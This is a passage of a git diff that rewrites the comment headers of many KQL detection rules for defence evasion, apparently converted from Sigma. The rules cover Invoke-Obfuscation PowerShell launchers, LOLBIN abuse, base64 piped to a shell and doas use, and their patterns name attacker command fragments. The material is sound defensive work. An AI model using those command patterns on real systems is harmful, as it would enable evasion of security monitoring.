 | where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\ie4uinit.exe")))) and (not(((RegistryValueData contains "DWORD (0x00000001)" and (InitiatingProcessFolderPath contains "\\Temp\\" and InitiatingProcessFolderPath contains "\\.cr\\avira_")) or (RegistryValueData contains "DWORD (0x00000001)" and (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe", "C:\\Program Files\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe"))))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql
index e80d4f9a..d4bf3bbf 100644
--- a/KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql
@@ -1,10 +1,10 @@
-// Title: Invoke-Obfuscation CLIP+ Launcher
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020-10-13
-// Level: high
-// Description: Detects Obfuscated use of Clip.exe to execute PowerShell
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Invoke-Obfuscation CLIP+ Launcher
+// Author: Jonathan Cheong, oscd.community
+// Date: 2020-10-13
+// Level: high
+// Description: Detects Obfuscated use of Clip.exe to execute PowerShell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/r") and (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "clipboard]::" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql
index d1ec21ab..1ecf0bba 100644
--- a/KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql
@@ -1,10 +1,10 @@
-// Title: Invoke-Obfuscation COMPRESS OBFUSCATION
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2020-10-18
-// Level: medium
-// Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Invoke-Obfuscation COMPRESS OBFUSCATION
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2020-10-18
+// Level: medium
+// Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "system.io.compression.deflatestream" or ProcessCommandLine contains "system.io.streamreader" or ProcessCommandLine contains "readtoend(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "text.encoding]::ascii")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql
index df6c48fa..d5e8ee7d 100644
--- a/KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql
@@ -1,10 +1,10 @@
-// Title: Invoke-Obfuscation Obfuscated IEX Invocation
-// Author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
-// Date: 2019-11-08
-// Level: high
-// Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Invoke-Obfuscation Obfuscated IEX Invocation
+// Author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
+// Date: 2019-11-08
+// Level: high
+// Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where ProcessCommandLine matches regex "\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[" or ProcessCommandLine matches regex "\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[" or ProcessCommandLine matches regex "\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[" or ProcessCommandLine matches regex "\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}" or ProcessCommandLine matches regex "\\*mdr\\*\\W\\s*\\)\\.Name" or ProcessCommandLine matches regex "\\$VerbosePreference\\.ToString\\(" or ProcessCommandLine matches regex "\\[String\\]\\s*\\$VerbosePreference"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql
index dfb4d941..f757d6cc 100644
--- a/KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql
@@ -1,10 +1,10 @@
-// Title: Invoke-Obfuscation STDIN+ Launcher
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020-10-15
-// Level: high
-// Description: Detects Obfuscated use of stdin to execute PowerShell
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Invoke-Obfuscation STDIN+ Launcher
+// Author: Jonathan Cheong, oscd.community
+// Date: 2020-10-15
+// Level: high
+// Description: Detects Obfuscated use of stdin to execute PowerShell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\""
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql
index 43b33d4b..21843273 100644
--- a/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql
@@ -1,10 +1,10 @@
-// Title: Invoke-Obfuscation VAR+ Launcher
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020-10-15
-// Level: high
-// Description: Detects Obfuscated use of Environment Variables to execute PowerShell
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Invoke-Obfuscation VAR+ Launcher
+// Author: Jonathan Cheong, oscd.community
+// Date: 2020-10-15
+// Level: high
+// Description: Detects Obfuscated use of Environment Variables to execute PowerShell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r)(?:\\s|)\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\""
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql
index 873f59b9..2a825bce 100644
--- a/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql
@@ -1,10 +1,10 @@
-// Title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2020-10-13
-// Level: high
-// Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2020-10-13
+// Level: high
+// Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "{0}" or ProcessCommandLine contains "{1}" or ProcessCommandLine contains "{2}" or ProcessCommandLine contains "{3}" or ProcessCommandLine contains "{4}" or ProcessCommandLine contains "{5}") and (ProcessCommandLine contains "&&set" and ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql
index df58ebd7..f7ba515b 100644
--- a/KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql
@@ -1,10 +1,10 @@
-// Title: Invoke-Obfuscation Via Stdin
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020-10-12
-// Level: high
-// Description: Detects Obfuscated Powershell via Stdin in Scripts
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Invoke-Obfuscation Via Stdin
+// Author: Nikita Nazarov, oscd.community
+// Date: 2020-10-12
+// Level: high
+// Description: Detects Obfuscated Powershell via Stdin in Scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where ProcessCommandLine matches regex "(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*""
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql
index 53a7e851..c7f60be2 100644
--- a/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql
@@ -1,10 +1,10 @@
-// Title: Invoke-Obfuscation Via Use Clip
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020-10-09
-// Level: high
-// Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Invoke-Obfuscation Via Use Clip
+// Author: Nikita Nazarov, oscd.community
+// Date: 2020-10-09
+// Level: high
+// Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where ProcessCommandLine matches regex "(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql
index 320b20d7..230a5c07 100644
--- a/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql
+++ b/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql
@@ -1,10 +1,10 @@
-// Title: Invoke-Obfuscation Via Use MSHTA
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020-10-08
-// Level: high
-// Description: Detects Obfuscated Powershell via use MSHTA in Scripts
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Invoke-Obfuscation Via Use MSHTA
+// Author: Nikita Nazarov, oscd.community
+// Date: 2020-10-08
+// Level: high
+// Description: Detects Obfuscated Powershell via use MSHTA in Scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "set" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "mshta" and ProcessCommandLine contains "vbscript:createobject" and ProcessCommandLine contains ".run" and ProcessCommandLine contains "(window.close)"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/jscript_compiler_execution.kql b/KQL/rules/Defense Evasion/jscript_compiler_execution.kql
index b490c7ef..a8c1cf13 100644
--- a/KQL/rules/Defense Evasion/jscript_compiler_execution.kql
+++ b/KQL/rules/Defense Evasion/jscript_compiler_execution.kql
@@ -1,13 +1,13 @@
-// Title: JScript Compiler Execution
-// Author: frack113
-// Date: 2022-05-02
-// Level: low
-// Description: Detects the execution of the "jsc.exe" (JScript Compiler).
-// Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1127
-// False Positives:
-// - Legitimate use to compile JScript by developers.
-
-DeviceProcessEvents
+// Title: JScript Compiler Execution
+// Author: frack113
+// Date: 2022-05-02
+// Level: low
+// Description: Detects the execution of the "jsc.exe" (JScript Compiler).
+// Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+// - Legitimate use to compile JScript by developers.
+
+DeviceProcessEvents
 | where FolderPath endswith "\\jsc.exe" or ProcessVersionInfoOriginalFileName =~ "jsc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql b/KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql
index cd771809..90e5378a 100644
--- a/KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql
+++ b/KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql
@@ -1,10 +1,10 @@
-// Title: Kavremover Dropped Binary LOLBIN Usage
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-11-01
-// Level: high
-// Description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1127
-
-DeviceProcessEvents
+// Title: Kavremover Dropped Binary LOLBIN Usage
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-01
+// Level: high
+// Description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " run run-cmd " and (not((InitiatingProcessFolderPath endswith "\\cleanapi.exe" or InitiatingProcessFolderPath endswith "\\kavremover.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql b/KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql
index 4c4ad593..60eb710d 100644
--- a/KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql
+++ b/KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql
@@ -1,12 +1,12 @@
-// Title: Kernel Memory Dump Via LiveKD
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-16
-// Level: high
-// Description: Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Unlikely in production environment
-
-DeviceProcessEvents
+// Title: Kernel Memory Dump Via LiveKD
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: high
+// Description: Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely in production environment
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -m" or ProcessCommandLine contains " /m" or ProcessCommandLine contains " –m" or ProcessCommandLine contains " —m" or ProcessCommandLine contains " ―m") and ((FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql b/KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql
index 1be53fa6..09cd1468 100644
--- a/KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql
+++ b/KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql
@@ -1,12 +1,12 @@
-// Title: Launch-VsDevShell.PS1 Proxy Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-19
-// Level: medium
-// Description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1216.001
-// False Positives:
-// - Legitimate usage of the script by a developer
-
-DeviceProcessEvents
+// Title: Launch-VsDevShell.PS1 Proxy Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216.001
+// False Positives:
+// - Legitimate usage of the script by a developer
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "VsWherePath " or ProcessCommandLine contains "VsInstallationPath ") and ProcessCommandLine contains "Launch-VsDevShell.ps1"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql b/KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql
index 0b5b55cf..5f722cba 100644
--- a/KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql
+++ b/KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql
@@ -1,10 +1,10 @@
-// Title: Legitimate Application Dropped Archive
-// Author: frack113, Florian Roth
-// Date: 2022-08-21
-// Level: high
-// Description: Detects programs on a Windows system that should not write an archive to disk
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceFileEvents
+// Title: Legitimate Application Dropped Archive
+// Author: frack113, Florian Roth
+// Date: 2022-08-21
+// Level: high
+// Description: Detects programs on a Windows system that should not write an archive to disk
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\finger.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\hh.exe") and (FolderPath endswith ".zip" or FolderPath endswith ".rar" or FolderPath endswith ".7z" or FolderPath endswith ".diagcab" or FolderPath endswith ".appx")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql b/KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql
index ae11a00a..6f51b276 100644
--- a/KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql
+++ b/KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql
@@ -1,10 +1,10 @@
-// Title: Legitimate Application Dropped Executable
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022-08-21
-// Level: high
-// Description: Detects programs on a Windows system that should not write executables to disk
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceFileEvents
+// Title: Legitimate Application Dropped Executable
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-08-21
+// Level: high
+// Description: Detects programs on a Windows system that should not write executables to disk
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".ocx")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql b/KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql
index 33903996..3403e948 100644
--- a/KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql
+++ b/KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql
@@ -1,10 +1,10 @@
-// Title: Legitimate Application Dropped Script
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022-08-21
-// Level: high
-// Description: Detects programs on a Windows system that should not write scripts to disk
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceFileEvents
+// Title: Legitimate Application Dropped Script
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-08-21
+// Level: high
+// Description: Detects programs on a Windows system that should not write scripts to disk
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".vbs" or FolderPath endswith ".scf" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql b/KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql
index 190919e4..ff5fb23f 100644
--- a/KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql
+++ b/KQL/rules/Defense Evasion/linux_base64_encoded_pipe_to_shell.kql
@@ -1,12 +1,12 @@
-// Title: Linux Base64 Encoded Pipe to Shell
-// Author: pH-T (Nextron Systems)
-// Date: 2022-07-26
-// Level: medium
-// Description: Detects suspicious process command line that uses base64 encoded input for execution with a shell
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1140
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Linux Base64 Encoded Pipe to Shell
+// Author: pH-T (Nextron Systems)
+// Date: 2022-07-26
+// Level: medium
+// Description: Detects suspicious process command line that uses base64 encoded input for execution with a shell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "base64 " and ((ProcessCommandLine contains "| bash " or ProcessCommandLine contains "| sh " or ProcessCommandLine contains "|bash " or ProcessCommandLine contains "|sh ") or (ProcessCommandLine endswith " |sh" or ProcessCommandLine endswith "| bash" or ProcessCommandLine endswith "| sh" or ProcessCommandLine endswith "|bash"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql b/KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql
index fc0293f8..5039075a 100644
--- a/KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql
+++ b/KQL/rules/Defense Evasion/linux_base64_encoded_shebang_in_cli.kql
@@ -1,12 +1,12 @@
-// Title: Linux Base64 Encoded Shebang In CLI
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-15
-// Level: medium
-// Description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1140
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Linux Base64 Encoded Shebang In CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "IyEvYmluL2Jhc2" or ProcessCommandLine contains "IyEvYmluL2Rhc2" or ProcessCommandLine contains "IyEvYmluL3pza" or ProcessCommandLine contains "IyEvYmluL2Zpc2" or ProcessCommandLine contains "IyEvYmluL3No"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql b/KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql
index 52ea8311..03d91df4 100644
--- a/KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql
+++ b/KQL/rules/Defense Evasion/linux_doas_conf_file_creation.kql
@@ -1,12 +1,12 @@
-// Title: Linux Doas Conf File Creation
-// Author: Sittikorn S, Teoderick Contreras
-// Date: 2022-01-20
-// Level: medium
-// Description: Detects the creation of doas.conf file in linux host platform.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Linux Doas Conf File Creation
+// Author: Sittikorn S, Teoderick Contreras
+// Date: 2022-01-20
+// Level: medium
+// Description: Detects the creation of doas.conf file in linux host platform.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath endswith "/etc/doas.conf"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/linux_doas_tool_execution.kql b/KQL/rules/Defense Evasion/linux_doas_tool_execution.kql
index 5d86ef35..ef61492e 100644
--- a/KQL/rules/Defense Evasion/linux_doas_tool_execution.kql
+++ b/KQL/rules/Defense Evasion/linux_doas_tool_execution.kql
@@ -1,12 +1,12 @@
-// Title: Linux Doas Tool Execution
-// Author: Sittikorn S, Teoderick Contreras
-// Date: 2022-01-20
-// Level: low
-// Description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Linux Doas Tool Execution
+// Author: Sittikorn S, Teoderick Contreras
+// Date: 2022-01-20
+// Level: low
+// Description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where FolderPath endswith "/doas"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/linux_package_uninstall.kql b/KQL/rules/Defense Evasion/linux_package_uninstall.kql
index cd19f090..458dd45e 100644
--- a/KQL/rules/Defense Evasion/linux_package_uninstall.kql
+++ b/KQL/rules/Defense Evasion/linux_package_uninstall.kql
@@ -1,12 +1,12 @@
-// Title: Linux Package Uninstall
